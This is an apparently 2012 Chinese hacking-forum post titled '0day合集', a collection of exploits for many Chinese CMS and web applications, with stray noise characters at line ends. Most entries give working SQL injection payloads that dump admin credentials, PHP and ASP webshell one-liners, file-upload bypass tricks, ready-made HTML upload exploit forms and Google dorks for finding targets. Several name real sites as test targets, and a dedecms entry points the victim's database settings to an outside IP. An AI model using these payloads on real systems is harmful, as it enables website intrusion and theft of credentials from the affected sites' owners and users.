找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3013|回复: 1
打印 上一主题 下一主题

0day合集

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:58:38 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
启航企业建站系统 cookie注入漏洞通杀所有版本
" w1 [$ T( T7 M" ]- z4 y. _4 @6 d; R5 g) G9 d7 Y) P& k
直接上exploit:5 K# H9 D' Z- `1 I: \
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));. P2 C6 `, f: k& P1 a. {
test:http://www.tb11.net/system/xitong/shownews.asp?id=210" ~; v4 s, f6 a9 L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) B7 U8 Z" Z8 hAsprain论坛 注册用户 上传图片就可拿到webshell, ]  Y2 P% w& P9 W: g$ e
: S8 U' w& C1 z) l3 C. z
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。+ v: x$ ?& d0 h( Z% [
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>( S8 l2 P! a8 w; x
2.gif 为一小图片文件,一定要小,比如qq表情图片6 _. D) D" n% y' j" p9 A
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用. L8 [- d$ C1 ?
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
6 L, G& o! ]3 Z9 P, L5 w2 j- U8 o5.q.asp;.gif
' l( _6 Y; ~  I3 [& J% }* }& K' Ugoogle:Powered by Asprain
" i% J* p5 d7 F( c  Y3 M! c/ b--------------------------------------------------------------------------------------------------------------------------------------------------------------------------: ?' ]! x; I7 _
+ z1 F; v9 c. @) ~, l" o+ R
ShopNum1全部系统存在上传漏洞。& I5 d1 e0 t( p5 u# p. b

2 o! A/ `9 ]) w% F9 P首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。, p) c! b) {. [: F! e
按说明 提示登录后台。。
3 q+ T5 _$ j# {4 {在后台功能页面->附件管理->附件列表3 C; M* k8 @8 w4 R3 }+ t2 n: P
可以直接上传.aspx 后缀木马/ K; q- B2 g  x, j+ L/ R" ~* J
http://demo.shopnum1.com/upload/20110720083822500.aspx
. ]% u% c& j0 j! T2 [/ V4 E--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ G4 ^( y! c  G7 f+ T  }/ _( W" z8 w, _
牛牛CMS中小企业网站管理系统 上传漏洞
: x: v9 |+ N% x5 Q# l
! H8 |5 F6 [5 Q7 C# v牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
& U4 W, S' J/ F3 U5 C3 Z" T2 ?* v后台:admin/login.asp
% V5 x! H0 r, g  ]$ e5 s8 tewebeditor 5.5 Nday" J3 D$ ^0 H9 C+ t) E- K
exp:
% _) B& k- x8 z3 n<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?5 a1 P+ [3 y% y
<input?type=file?name=uploadfile?size=100><br><br>?
2 s% g8 B- c% v3 w<input?type=submit?value=upload>?
  k+ y0 _0 `# I</form>
$ C* ?3 k+ D( C" Eps:先上传小马.
$ B/ U* Z1 `9 ~5 p! q# f- {% Kinurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏- R2 s, Y  Y" k8 A

$ R# K; W( N: t2 I5 i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 B2 N7 ^! ^$ _- o9 i0 d4 V! D7 ~. P0 g4 {
YothCMS 遍历目录漏洞& J8 ^1 T; ?( h, r5 P. d- s6 g  j

1 v6 o' ]% `  i& A+ B0 b0 A优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
. x6 p! Z9 A* i& h7 f默认后台:admin/login.asp
: c3 Y0 e3 D/ P- P遍历目录:8 }9 t8 m  ]2 y: z7 i( N
ewebeditor/manage/upload.asp?id=1&dir=../" J$ _% r. A2 P
data:
( c. l7 g( K+ F& ohttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa2 `5 u* x" ~9 T: J/ I# V
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------+ N, S; A0 ?* K* J; Z2 F

* @& q- M9 i2 U" ONet112企业建站系统 1.0# z0 b" ?$ @( c4 {  X

: @5 _" J% A# N+ u6 n! r源码简介:( A( ^- Y/ m/ T4 L* }; V
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
& D; x) K. ^4 O添加管理员:3 _& D7 N$ I* }7 X* A6 Z3 S
http://www.0855.tv/admin/admin.asp?action=add&level=2/ k8 V2 O& {' _4 s
其实加不加都不是很重要,后台文件都没怎么作验证。
. @- y, S9 e5 J7 U4 z# ?上传路径:
8 v8 Q# m, X4 q5 e$ `http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200. Y4 o1 s- U7 u
http://www.0855.tv/inc/Upfile.asp?Stype=2
. S4 k, \/ j$ n4 G9 [& j. P+ R: |怎么利用自己研究。
: z8 n7 [9 [3 H遍历目录:
, W/ f1 _$ N- A/ S9 U' i8 Zhttp://www.0855.tv/admin/upfile.asp?path=../..* N) F# ^* a5 f+ E/ f# T( m
如:+ d1 W: C/ _4 C! @
http://www.0855.tv/admin/upfile.asp?path=../admin
3 m6 n2 s: G6 L8 y; R4 u8 f# u  chttp://www.0855.tv/admin/upfile.asp?path=../data- F3 o/ _; k% T+ z/ r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- u; B* A: l+ A7 M% v6 }
- h2 O6 w' }% _2 \
易和阳光购物商城通杀 上传漏洞/ d5 A. o# I4 E: K

- P- Q' h2 D+ O- Y4 S3 X/ [前提要求是IIS6.0+asp坏境。
3 ?7 y7 b' T8 Z  A9 t漏洞文件Iheeo_upfile.asp 6 G8 L1 W& C, V$ t# V- ^9 k
过滤不严.直接可以iis6.0上传/ T; c6 S* R  Z' k# B
把ASP木马改成0855.asp;1.gif8 v* A' y3 x/ }$ _+ Z  F: I
直接放到明小子上传" K7 e9 _8 P7 `% u/ i* o
Google搜索:inurl:product.asp?Iheeoid=
  g! c0 ]+ [3 X# D6 r, k3 k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------" e3 r/ m5 C2 F
( v+ g. N$ ~" Y. Z9 Q( [* `) F" N
phpmyadmin后台4种拿shell方法
5 S; a; W5 P. C4 H6 |( n  `
$ j3 f. \# {7 t' T* M  G方法一:
3 V' [: \2 E( F0 _. h) `/ xCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
. N& U, ~! t6 TINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');' n7 ~' h- @* w3 ~% q4 N& }3 b9 M  i  M
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';1 _7 ^9 j/ |( A" I$ ^; ?+ P
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php7 w( E0 [4 q- ^# _" P" r) B: n
一句话连接密码:xiaoma9 ]2 s0 A* r5 u" q5 `
方法二:% p& D+ a- P. b7 W; k) b( x
Create TABLE xiaoma (xiaoma1 text NOT NULL);+ P3 v6 t! B; F
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');+ v4 L2 h1 l2 X
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';1 {- @5 @; w5 s$ L/ Q' l( z: ?, T* K. H
Drop TABLE IF EXISTS xiaoma;
: `. A- b( K- W& n3 Z方法三:2 q  `/ x8 t3 y/ F
读取文件内容:    select load_file('E:/xamp/www/s.php');
- R; V" J7 Q, l: K0 }- `5 c% N, P$ x写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
' {% x5 {  E8 W7 r: `. Fcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'4 ^3 Z2 t  E0 e' ]% O& m
方法四:8 z7 r" I0 K% |. ?6 ?
select load_file('E:/xamp/www/xiaoma.php');
  l1 T" [# @3 c( P+ W! }4 J5 L/ u9 Y! oselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
% v% U) {5 Y( x然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir  K/ K( W* C% h0 k9 L# e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 J7 Z, C8 H' e, C- d

- G! k3 ~1 i2 ^传信网络独立开发网站源码0day漏洞
% S) @  y/ c0 ~8 v+ A$ ^2 o/ W  y/ y  m. I7 u  d6 _2 @: g
后台system/login.asp0 N: V8 {) {2 R, j5 h! J  H6 I
进了后台有个ewebeditor! p' i! Q9 t2 o7 A
Google 搜索inurl:product1.asp?tyc=4 E: h' i) I& @& e" d
编辑器漏洞默认后台ubbcode/admin_login.asp! A% x  C" }$ y- u9 ^) U9 Q6 c, z+ n
数据库ubbcode/db/ewebeditor.mdb1 \$ X" R" N9 y; W% Q9 p) ^
默认账号密码yzm 111111
, x4 |( A4 Y5 k  T  [+ A( H! e
拿webshell方法) ^* p1 o" d1 I' ~' L" Q# v7 e9 I/ e
登陆后台点击“样式管理”-选择新增样式 8 @* C# T, m" l3 k8 f
样式名称:scriptkiddies 随便写
8 _2 B' q) V5 P- ^& a( x路径模式:选择绝对路径
4 o" F, T8 D" B! B/ F5 N3 K图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx) Y: c& L3 R; T% x
图片类型比如就是我们要上传的ASP木马格式
5 o7 D1 ?5 b: t3 w4 d& k  u上传路径:/) d- F0 _' c3 c: p" t* K# `6 T
图片限制:写上1000 免的上不了我们的asp木马5 ~- Q$ K, n; A
上传内容不要写
( @0 B3 P% s. G8 V: O5 _0 C+ ?* S可以提交了 ( ]6 k, c1 E; L
样式增加成功! ! v0 s5 P! N# O  c, w
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
9 }. p6 W* S5 {) c. O4 |按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置! D9 K8 O$ m! y) V3 r
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies6 a; j8 J% j9 q$ ]' w! u
上ASP木马 回车 等到路径
2 [1 C4 X/ g# s  v$ B4 t. y! M. Y6 O# o, M$ s
后台:system/login.asp; ]9 Y2 u" w* c7 Y' i) n" j  _
Exp:0 a4 m: K% X! _$ Q
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master( j2 j4 \2 D9 @. @5 {, W
测试:
4 Y# D- a; \+ o$ ?9 ^http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master8 u- R( d  _: i1 p) Z9 O
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master9 h* K! @; Y1 P8 Z" K
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------# @# R2 e" ]- l9 o' k+ O
+ N! r. i. ^7 l0 ~8 i/ `
foosun 0day 最新注入漏洞
8 S7 |, K: D3 u
8 G) B% u/ L+ t# A' s8 T漏洞文件:www.xxx.com/user/SetNextOptions.asp: k' D. X; I1 L& X
利用简单的方法:
/ b/ q+ K" a/ s. U7 q" Y' `8 y暴管理员帐号:
9 ]  E0 c$ Z- c& u, yhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
& G$ \* u" y5 r! ]  `8 c4 v暴管理员密码:5 L( G6 K# f* U& D3 R2 e
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,$ s3 E' Q, H) X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------, t( \# M# Z6 `9 m: u6 Y; E
& v( y1 S! A1 p5 j- E/ p
网站程序的版权未知!2 U$ @2 u& O  G  u
' G1 [) w6 ?. q( z# D$ Z6 ^
默认网站数据库:2 M+ d9 M0 s, k$ Q
www.i0day.com/data/nxnews.mdb
/ L8 [: j$ @8 l" Xewebeditor 在线编辑器:
* P4 e: n3 }. ~" F. Y编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb" w/ L3 [. e. z3 @  E+ k
登录地址:ewebeditor/admin_login.asp1 v# _0 r, P# p% x2 v7 o. E: N
默认密码:admin  admin
# J2 ~) V+ n7 n$ D0 o4 Y登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data- D" Z% f0 P- [- ~6 z) `
6 ]& B, K% Q2 x
Sql注入漏洞:
* t  o; Z8 k9 }$ b; ~http://www.i0day.com/detail.asp?id=12
; |  i$ P6 R6 Q* Iexp:7 C& `" ^3 i9 e$ ~4 g. Y5 [
union select 1,admin,password,4,5,6,7,8 from admin
5 z; d" o, t! W1 Y2 M0 ]爆出明文帐号/密码
7 U- l( ?0 w9 [2 {
: s- I( a4 J& D- G上传漏洞:
8 X% n& M' F' g# l! p- d0 U后台+upfile.asp
. C: |( w& `1 S) T; o) D如:
0 t* D) ^! Z' m2 L0 uhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。# L) q6 ~" i% V0 d' h2 r
shell的地址:网址+后台+成功上传的马" u) J5 u; d. d
google:inurl:news.asp?lanmuName=
& v+ l3 y8 ~% N" T* v" A+ U$ G------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- M: M+ h/ M. w
6 I# i4 U, |* e: r* D1 x& jdedecms最新0day利用不进后台直接拿WEBSHELL) Z' L5 l: I! @5 e

0 r4 j( O8 B1 d7 k6 D6 a6 j0 }; T拿webshell的方法如下:
5 j' G# K; X! {* i. T& Z网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
; J+ D$ `" }4 e: A  O$ ]前题条件,必须准备好自己的dede数据库,然后插入数据:+ `& _) A2 @" B0 e4 H
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); : Z! Y1 {- H( N3 r' F% X

2 A, M0 N" r  y+ e5 ~0 b再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。) x& b3 e  }; U6 D( p" m; R
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
- R6 E( B- y6 h9 e1 H5 O% X: T<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
2 j6 ]9 W/ J1 C, O. |, L<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />! v% e" y4 y% I2 m7 V
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />* T# P2 L  a! U( D, f  a( l
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
0 \9 g8 u) w/ B* z; r<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
  ]( e, z' i1 H& g<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
6 R* z/ y/ x5 ]+ I! [<input type="text" value="true" name="nocache" style="width:400">
8 O/ C5 Y# K  y4 j# A<input type="submit" value="提交" name="QuickSearchBtn"><br />! p0 q( P6 \3 O1 {
</form>* z1 l6 p8 m3 O7 z) F1 l( B
<script>
. L( C! }$ g0 w2 _' G. Cfunction addaction()* {9 N: K3 }$ ~4 t# f3 W  C: p
{
# U- Y9 ?; D$ a: [& tdocument.QuickSearch.action=document.QuickSearch.doaction.value;( A0 ?3 Z5 p8 G" r! N; C4 |
}  Q; t4 K. K& N9 D/ e  ?7 J7 Q( X; s
</script>9 W4 M# M! M0 n- ^. h1 j
-----------------------------------------------------------------------------------------------------------------------------------------------
' r  G. |3 W* |% m
1 w/ U( [5 I- v+ c0 q! X6 Tdedecms织梦暴最新严重0day漏洞
) S  m( v6 a7 M, e/ O) Q% i* gbug被利用步骤如下:- e; H5 z  D$ ^! I) Q, u$ w6 t
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root* X7 ]- U: N+ ^* s4 k% ~6 Y
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
7 u) }4 w, G# u( k9 r; l7 |-------------------------------------------------------------------------------------------------------------------------------------------$ }/ E  _) e+ ^' [! a' o1 M
. e" V( w- A8 Y8 h
多多淘宝客程序上传漏洞
! s8 P2 a* s# P$ c漏洞页面:0 [1 t$ u7 |* K% L+ x$ Q
admin\upload_pic.php6 ^' N9 m! Y" _
传送门:
1 i; u9 i& w1 h9 F+ ?2 r5 \http://www.www.com/admin/upload_pic.php?uploadtext=slide1; M8 i: @- @* b  K4 G
PS:copy张图片马 直接  xxx.php 上传抓包地址!2 E' L- ~8 d; n, X1 L" j! d. T9 u
------------------------------------------------------------------------------------------------------------------------------------------------------% C$ l; j  O" V8 a
' n  A0 [( q2 {  a- r9 j" e
无忧公司系统ASP专业版后台上传漏洞
3 ^3 W0 @( V+ g漏洞文件 后台上传
0 l9 s: w5 c$ ]) \* Q+ fadmin/uploadPic.asp
* F: Q4 d! p- @: B0 @( @漏洞利用 这个漏洞好像是雷池的7 X) V0 ?7 y3 ~. L
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1+ e7 A: _7 \6 G. j0 S7 }
等到的webshell路径:) m: a2 @, B4 s3 U8 j
/UploadFiles/scriptkiddies.asp;_2.gif
' F. ^; n: }8 F3 ^. q; |---------------------------------------------------------------------------------------------------------------------------------------------------  k& d& g4 b! L7 Q! ~

0 T0 q+ n* y! d( N住哪酒店分销联盟系统2010( R" |1 ~0 v6 {, s8 p% N
Search:
' p0 k& [* D& A8 ginurl:index.php?m=hotelinfo
9 b9 |/ Q2 ?! I" {  E( u: j7 \http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
# n% e0 c  m1 \' |2 L" }默认后台:index.php?m=admin/login
7 K2 `8 n" W/ `  x--------------------------------------------------------------------------------------------------------------------------------------------------' y: z/ w2 f) H% u

  D7 Q* V6 K$ j7 ginurl:info_Print.asp?ArticleID=
- u5 b8 C8 c. t( u后台 ad_login.asp
1 x# e- C. Y5 P7 z6 |, f爆管理员密码:* T+ G, r3 {; n7 N7 }% b3 D' P
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin: i4 [) y: ^, G+ i. x
------------------------------------------------------------------------------------------------------------------------------------------------------------
5 G, [9 }4 u5 Q# F
6 T8 E; C( z+ b/ E/ E+ w搜索框漏洞!; t6 p; ]& s0 T. @% v( O; U! g
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
9 j$ }2 O7 M+ r0 J' {0 M--------------------------------------------------------------------------------------------------------------------------------------------------------5 ^4 ?! B. i, }7 D7 K# Q
* z" Z1 s, |) @, H: {/ Z$ n
关键字:, U; N$ k! b4 ~2 ~  E# F5 ]
inurl:/reg_TemletSel.asp?step=2
8 A( X2 ?5 _( t% D或者
: O2 g) m1 ?# C( |  m电子商务自助建站--您理想的助手
0 v  C! `; F( p9 x6 P* q-------------------------------------------------------------------------------------------------------------------------------------------------- H+ v! k' j; L6 I' Q9 |/ @1 h  U
" d6 q% J9 G% F6 }2 a+ W3 b$ w5 a
iGiveTest 2.1.0注入漏洞
, a6 ^% b; [& C! E8 S; E, d2 p6 SVersion: <= 2.1.0" k; f# h0 U. I- F3 G
# Homepage: http://iGiveTest.com/
2 i  `% m3 W7 W$ H3 `! _8 N谷歌关键字: “Powered by iGiveTest”3 p- r) W2 @8 W3 {) r/ y
随便注册一个帐号。然后暴管理员帐号和密码
# Y4 t$ B, c* w' a# q6 g8 x6 |0 L6 Yhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1; _# k7 ^9 `/ K) v$ l' z" @
------------------------------------------------------------------------------------------------------------------------------------------------
* T, F. Z6 s- y9 D1 A% a9 W+ z7 S+ M
: E- j+ L# l  mCKXP网上书店注入漏洞: r! [! m# f# I) H; Z% q
工具加表:shop_admin 加字段:admin* ^5 J  A% a6 ~3 c  i
后台:admin/login.asp : J0 V4 a2 k5 C/ a4 ~
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
6 z' l2 _9 m) K4 f' f' Vinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
0 b' D  d! h4 G6 K3 I0 |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------% E3 D" F; f% D5 X5 U  q1 l* o( U; d

% k' f6 {3 `* P: i( k: d5 v段富超个人网站系统留言本写马漏洞" e2 E: S$ o0 ~
源码下载:http://www.mycodes.net/24/2149.htm
) a: q; l# V- n) O4 |addgbook.asp 提交一句话。- V. x4 P" \9 U! S8 G9 e5 M5 ~
连接: http://www.xxxx.tv/date/date3f.asp/ |2 C" ]1 j. H2 A- ^
google:为防批量,特略!4 u9 S$ U# R% P* ]$ L
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. o* ?7 k5 x7 |$ j+ o1 O" A3 F1 i
智有道专业旅游系统v1.0 注入及列目录漏洞" S6 c/ O% o0 o% A, _' T
默认后台路径:/admin/login.asp" D9 Y' v5 E5 p* b* P% C6 @; S
默认管理员:admin8 V6 T9 V# c( [" r: x' C
默认密码:123456
9 n- |0 O; E( _SQL EXP Tset:9 e3 T6 p9 y1 C1 Y- O6 g
http://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin2 v" c" T# E, H: [9 a7 R
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 j+ A/ |0 H* U5 C' R/ [1 U; @% K' y. }2 b* w' K
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
' a: L. I+ V4 L' U& R. U* M; i. nEXP:
/ Q  k8 F( |/ S  {7 N, }* k<title>eWebeditoR3.8 for php任意文件上EXP</title>' V* R. n$ b! {
<form action="" method=post enctype="multip' O5 |; _! K- j- z$ C' |
art/form-data">
2 h7 a% n8 O" D9 {; `, a' G  b<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> : q8 Q! g. A4 h2 Q3 o* P# n
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> ; ?# N5 ]( g/ V
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1"> " a' W. h* k+ q- Y* l0 T9 T
file:<input type=file name="uploadfile"><br>
. @3 x7 R4 G5 |3 i<input type=button value=submit onclick=fsubmit()> $ I8 E) R: X! a: W2 x! i
</form><br> - I8 k: f) D) p  G2 g) }
<script> 4 E+ R" c1 f; e
function fsubmit(){
' b2 |( @$ ^+ g: Q8 Lform = document.forms[0];
: l* \2 z+ ]8 g  Tform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; $ x6 w) [- U! U" d* V+ s6 V$ g
alert(form.action); $ U7 Z! I+ [4 z
form.submit(); / j, J. |# u. U9 E
} ) Y0 k2 m1 o3 m3 B( y
</script>
  G' `8 ?$ G  t. c5 q0 X! C8 E注意修改里面ewebeditor的名称还有路径。+ W/ U' u1 ~, F" ?2 N" o
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( L7 A1 a" L6 g$ D  H! N- ?! q" n( O2 c
+ a* b/ W3 e6 q% W: Z7 W. G提交’时提示ip被记录 防注入系统的利用
2 T3 y& |  l( p, Y6 M& O# ?0 H网址:http://www.xxx.com/newslist.asp?id=1226 Z% ~( u3 ]; \, ?0 P
提示“你的操作已被记录!”等信息。4 A; C& _' S5 @- I9 h6 q
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。
, m) \8 f0 E6 |. U* H( L-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ b' l3 R4 D% f
8 @  _: \, K! @3 r" |西部商务网站管理系统 批量拿shell-0day
0 n6 y9 J( `+ Y4 r( q( M2 Z这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb ) ^. z& g8 l2 ?7 O; K% w. Y) e- t1 Q
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
, ?! F9 A8 E$ G9 k1 o2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合1 u6 L8 S% j* v  z7 }0 k
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂9 t" |" w  Q/ ^# y' z; Y; f7 w
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ q+ F) V: F, ~0 n7 i: p
8 U. P7 ?! X0 D5 ~
JspRun!6.0 论坛管理后台注入漏洞
/ G8 D: [! h) N
" n" Q) j5 a& g  c* WSEBUG-ID:20787 发布时间:2011-04-30 影响版本:
5 ^  A- W9 _- P% o8 Y# [JspRun!6.0
1 \7 U" m' l, z! D漏洞描述:/ T/ N% r" a+ ~6 W6 V, X' i, ]
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。$ X0 w: P& b7 _6 X* O' k
在处理后台提交的文件中ForumManageAction.java第1940行9 d& ^. m  ^1 h- r; F. @' H. P
String export = request.getParameter("export");//直接获取,没有安全过滤
" t5 D& g5 R0 G$ G4 i4 tif(export!=null){
: r1 X- F. U0 f1 m! Z) o: X, YList&gt; styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...2 O( t' c  V' P, B/ G
if(styles==null||styles.size()==0){+ M# _) x& |6 e* E
<*参考
& i0 F+ {8 T$ @  ^  _6 Fnuanfan@gmail.com
- @- X( W$ t- E4 w) ?*> SEBUG安全建议:
9 r# ^2 g1 o. {, L0 xwww.jsprun.net. [5 s* S; U9 e5 z% W
(1)安全过滤变量export
$ t$ G# Y& @2 J2 P7 i, r9 z(2)在查询语句中使用占位符5 l$ M) x8 c% `" V8 w, q( ]
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 W# k: R' M# c( L
1 P& G& c6 p1 a6 L& z  G乌邦图企业网站系统 cookies 注入
! t. Q1 Q3 ?) b' h( S% X3 f/ Z- w0 X, g7 {7 R1 C) |8 p& e
程序完整登陆后台:/admin/login.asp
) a1 e2 Q2 L! n* |+ a7 w% n2 t& c默认登陆帐号:admin 密码:admin8882 d0 A3 N. H& i& |# U) d
语句:(前面加个空格)
- s0 x  P3 O- Pand 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin$ k( x/ c, q: t
或者是16个字段:; Y; z$ _5 j# y7 X; L: Y2 \
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
5 R, e; p. ]5 L; a, \8 d8 L爆不出来自己猜字段。9 w! [7 P9 A# s. e$ g+ c9 C9 g
注入点:http://www.untnt.com/shownews.asp?=88
" z6 i+ q7 |3 n& g2 r/ |getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
% S" G8 F/ p% r关键字:
8 j' l: K( a' E! tinurl:shownews?asp.id=
  ^" p1 G" p* R; D' ?7 [-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( n8 }0 x! [! N% e
$ N- v2 ^) G0 h7 w& e2 UCKXP网上书店注入漏洞* M' w8 K# t* i) n3 P1 M* F. N$ _

, O# N: [4 t3 Z' F工具加表:shop_admin 加字段:admin
0 D) e' I; ~9 [. C后台:admin/login.asp
1 _1 q% w  m/ P4 F7 B2 J- M* q登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
, t- G7 O$ P! f4 P2 minurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息. B! u- `2 R  T) M1 D8 Z0 ^
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 \1 p  S/ r( q$ F! U

